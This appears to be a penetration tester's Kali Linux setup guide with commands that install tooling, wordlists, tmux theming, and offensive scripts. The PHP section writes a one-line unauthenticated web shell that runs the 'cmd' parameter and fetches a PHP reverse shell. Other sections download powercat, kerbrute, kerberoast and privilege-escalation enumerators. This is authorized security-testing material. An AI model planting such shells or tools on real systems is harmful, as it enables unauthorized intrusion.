
Kali

Init

# Refresh the package index, then install the base toolset. Each package gets
# its own apt call, so one unavailable package does not block the others.
sudo apt update -y
for pkg in kali-linux-default jq lftp whatweb gobuster feroxbuster \
  smtp-user-enum html2text exploitdb fonts-hack-ttf; do
  sudo apt install -y "$pkg"
done

# Bring pip and setuptools up to date for the Python tooling installed later.
for py_pkg in pip setuptools; do
  pip3 install "$py_pkg" --upgrade
done

Tmux

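# Install the gpakosz tmux configuration in the home directory and link its
# .tmux.conf into place (-f replaces an existing link or file of that name).
cd ~
git clone https://github.com/gpakosz/.tmux.git
ln -s -f .tmux/.tmux.conf

# Start ~/.tmux.conf.local from scratch: the first redirect truncates any
# existing local overrides, the following lines append the theme settings.
echo "" > ~/.tmux.conf.local
echo "tmux_conf_theme_left_separator_main='\uE0B0'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_left_separator_sub='\uE0B1'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_right_separator_main='\uE0B2'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_right_separator_sub='\uE0B3'" >> ~/.tmux.conf.local
echo "tmux_conf_theme_status_left=' 💀 #S '"  >> ~/.tmux.conf.local
# The status-right segment shows the tun0 address when that interface exists
# and falls back to eth0 otherwise. The test is written as a plain
# "if /sbin/ifconfig tun0 ...; then": wrapping it in $(...) inside this
# double-quoted echo made the shell run the substitution while writing the
# file, leaving "#(if ; then ..." in the config, which is not a valid command.
echo "tmux_conf_theme_status_right=\" #{prefix}#{mouse}#{pairing}#{synchronized} #(if /sbin/ifconfig tun0 > /dev/null 2>/dev/null; then /sbin/ifconfig tun0 | /usr/bin/grep 'inet ' | /usr/bin/cut -d ' ' -f 10 2>/dev/null; else /sbin/ifconfig eth0 | /usr/bin/grep 'inet ' | /usr/bin/cut -d ' ' -f 10 2>/dev/null; fi) , %R , %d %b | #{username}#{root} | #{hostname} | #{IP} \""   >> ~/.tmux.conf.local


# Append the zsh prompt and reload the configuration (zsh only; every run of
# this step adds another PROMPT line to ~/.zshrc).
echo 'PROMPT="💀%B%F{39}%d%f%b%F{8} ~ %f"' >> ~/.zshrc
source ~/.zshrc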

/usr/share/wordlists

Payloads

wordlists_dir=/usr/share/wordlists

# Install the packaged wordlists and unpack the compressed rockyou list in place.
sudo apt install -y wordlists
sudo gunzip "$wordlists_dir/rockyou.txt.gz"

# SecLists comes from the distribution package (signed apt repository) and is
# linked next to the other wordlists.
sudo apt install -y seclists
sudo ln -s /usr/share/seclists "$wordlists_dir/seclists"

# Alternative kept for reference: fetch SecLists from the upstream master archive.
# sudo wget -c https://github.com/danielmiessler/SecLists/archive/master.zip -O /usr/share/wordlists/seclists.zip && sudo unzip /usr/share/wordlists/seclists.zip && sudo rm -f /usr/share/wordlists/seclists.zip && sudo mv /usr/share/wordlists/SecLists-master /usr/share/wordlists/seclists

# Cloned as root from the repository's default branch; no commit or tag is
# pinned, so the content depends on when the clone is made.
sudo git clone https://github.com/swisskyrepo/PayloadsAllTheThings.git "$wordlists_dir/payloadsAllTheThings"

#sudo git clone https://github.com/soffensive/windowsblindread.git /usr/share/wordlists/windowsblindread

/opt/linux

# Hand /opt to the kali user so the remaining steps run without sudo.
sudo chown kali:kali /opt
mkdir -p /opt/linux

# fetch_script LABEL URL DEST
# Prints the section banner, downloads URL to DEST and marks DEST executable.
# Nothing is verified after download: the URLs follow "latest" releases or the
# master branch, so review each script (or pin a tag and compare a checksum)
# before it is used on an engagement.
fetch_script() {
  echo "==========> Linux:$1"
  wget "$2" -O "$3"
  chmod +x "$3"
}

fetch_script "LinPeas" \
  https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh \
  /opt/linux/linux-peas.sh

fetch_script "LinEnum" \
  https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.sh \
  /opt/linux/linux-enum.sh

fetch_script "LES (Linux Exploit Suggester)" \
  https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh \
  /opt/linux/linux-exploit-suggester.sh

fetch_script "Linux Smart Enumeration" \
  https://github.com/diego-treitos/linux-smart-enumeration/releases/latest/download/lse.sh \
  /opt/linux/linux-smart-enum.sh

fetch_script "Linux Priv Checker" \
  https://raw.githubusercontent.com/linted/linuxprivchecker/master/linuxprivchecker.sh \
  /opt/linux/linux-priv-checker.sh

/opt/php

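# Hand /opt to the kali user so the remaining steps run without sudo.
sudo chown kali:kali /opt
mkdir -p /opt/php

echo "==========> PHP:shell.php"
# This file executes whatever arrives in the "cmd" request parameter, with no
# authentication. Keep /opt/php outside any directory that a web server on
# this workstation serves.
echo '<pre><?php echo shell_exec($_REQUEST["cmd"]) ?></pre>' > /opt/php/shell.php

echo "==========> PHP:r-shell.php"
# Fetched over HTTPS rather than plain HTTP so the archive cannot be altered
# in transit; the download is still not checked against a published checksum.
wget https://pentestmonkey.net/tools/php-reverse-shell/php-reverse-shell-1.0.tar.gz -O /opt/php/php-reverse-shell-1.0.tar.gz
# -C unpacks into /opt/php; without it tar extracts into whatever the current
# directory happens to be.
tar -xf /opt/php/php-reverse-shell-1.0.tar.gz -C /opt/php
rm /opt/php/php-reverse-shell-1.0.tar.gz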

/opt/windows

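# Hand /opt to the kali user so the remaining steps run without sudo.
sudo chown kali:kali /opt
mkdir -p /opt/windows
mkdir -p /opt/windows/sys

# Supply-chain note for this section: only kerbrute (v1.0.3) and BloodHound.py
# (v1.0.1) are pinned to a tag. The other downloads follow "latest" releases or
# the master branch, and none of them is checked against a checksum.

echo "==========> Windows:SysinternalsSuite"
wget https://download.sysinternals.com/files/SysinternalsSuite.zip -O /opt/windows/SysinternalsSuite.zip
# Use the full path of the archive: it was saved under /opt/windows, so a bare
# "SysinternalsSuite.zip" only resolves when that is the current directory.
unzip /opt/windows/SysinternalsSuite.zip -d /opt/windows/sys
rm /opt/windows/SysinternalsSuite.zip

#echo "==========> Windows:accesschk.exe"
#wget https://live.sysinternals.com/accesschk.exe -O /opt/windows/accesschk.exe

echo "==========> Windows:powercat.ps1"
git clone https://github.com/besimorhino/powercat.git /opt/windows/powercat

echo "==========> Windows:Sherlock.ps1 => (too run type: Find-AllVulns)"
wget https://raw.githubusercontent.com/rasta-mouse/Sherlock/master/Sherlock.ps1 -O /opt/windows/Sherlock.ps1

echo "==========> Windows:WinPeas.bat"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEAS.bat -O /opt/windows/winPEAS.bat

echo "==========> Windows:winPEASx86.exe"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx86.exe -O /opt/windows/winPEASx86.exe

echo "==========> Windows:winPEASx64.exe"
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/winPEASx64.exe -O /opt/windows/winPEASx64.exe

echo "==========> Windows:exploit-suggester"
# wesng is installed for the current user; the link exposes its "wes" entry
# point under /opt/windows. The path assumes the user is "kali".
pip3 install wesng
ln -s /home/kali/.local/bin/wes /opt/windows/windows-exploit-suggester

echo "==========> Windows:kerbrute"
wget https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_linux_amd64 -O /opt/windows/kerbrute
chmod +x /opt/windows/kerbrute
# Removes a kerbrute binary already present in /usr/bin; the error is hidden
# when there is none. Presumably done so only the pinned copy above is used.
sudo rm /usr/bin/kerbrute 2>/dev/null

echo "==========> Windows:kerberoast"
git clone https://github.com/nidem/kerberoast.git /opt/windows/kerberoast

echo "==========> Windows:bloodHoundPy"
wget https://github.com/fox-it/BloodHound.py/archive/refs/tags/v1.0.1.zip -O /opt/windows/bloodHoundPy.zip
unzip /opt/windows/bloodHoundPy.zip -d /opt/windows/
rm /opt/windows/bloodHoundPy.zip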

/opt/tools

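# Hand /opt to the kali user so the remaining steps run without sudo.
sudo chown kali:kali /opt
mkdir -p /opt/tools

echo "==========> Tools:impacket"
git clone https://github.com/SecureAuthCorp/impacket.git /opt/tools/impacket
# NOTE(review): the next three commands run as root on an unpinned clone, so
# the repository's install code executes with full privileges. The final
# "setup.py install" looks redundant after "pip3 install ." - confirm before
# removing it.
sudo pip3 install -r /opt/tools/impacket/requirements.txt
cd /opt/tools/impacket/
sudo pip3 install .
sudo python3 setup.py install

echo "==========> Tools:finger"
wget https://pentestmonkey.net/tools/finger-user-enum/finger-user-enum-1.0.tar.gz -O /opt/tools/finger-user-enum-1.0.tar.gz
# -C unpacks into /opt/tools; the current directory is still
# /opt/tools/impacket at this point, so a bare "tar -xf" would extract there.
tar -xf /opt/tools/finger-user-enum-1.0.tar.gz -C /opt/tools
rm /opt/tools/finger-user-enum-1.0.tar.gz

echo "==========> Tools:cms:drupwn"
wget https://github.com/immunIT/drupwn/archive/refs/tags/1.0.4.tar.gz -O /opt/tools/drupwn.tar.gz
# Same reason for -C: the "cd" below expects the tree under /opt/tools.
tar -xf /opt/tools/drupwn.tar.gz -C /opt/tools
rm /opt/tools/drupwn.tar.gz
cd /opt/tools/drupwn-1.0.4
sudo python3 setup.py install

echo "==========> Tools:cms:droopescan"
git clone https://github.com/droope/droopescan.git /opt/tools/droopescan
cd /opt/tools/droopescan
pip3 install -r requirements.txt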

Firefox extensions

  • HackTools
  • FoxyProxy
  • Fire Source Viewer
  • Wappalyzer

Waterfox configuration

~/.local/share/applications/waterfox.desktop

#!/usr/bin/env xdg-open
[Desktop Entry]
Version=1.0
Type=Application
Name=Waterfox
Exec=/opt/waterfox/waterfox
Icon=/opt/waterfox/browser/chrome/icons/default/default48.png

  • Pentest Monkey: http://pentestmonkey.net
  • LinPeas: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/linPEAS
  • LinEnum: https://github.com/rebootuser/LinEnum
  • LES (Linux Exploit Suggester): https://github.com/mzet-/linux-exploit-suggester
  • Linux Smart Enumeration: https://github.com/diego-treitos/linux-smart-enumeration
  • Linux Priv Checker: https://github.com/linted/linuxprivchecker
  • Sysinternals Suite: https://learn.microsoft.com/en-us/sysinternals/downloads/sysinternals-suite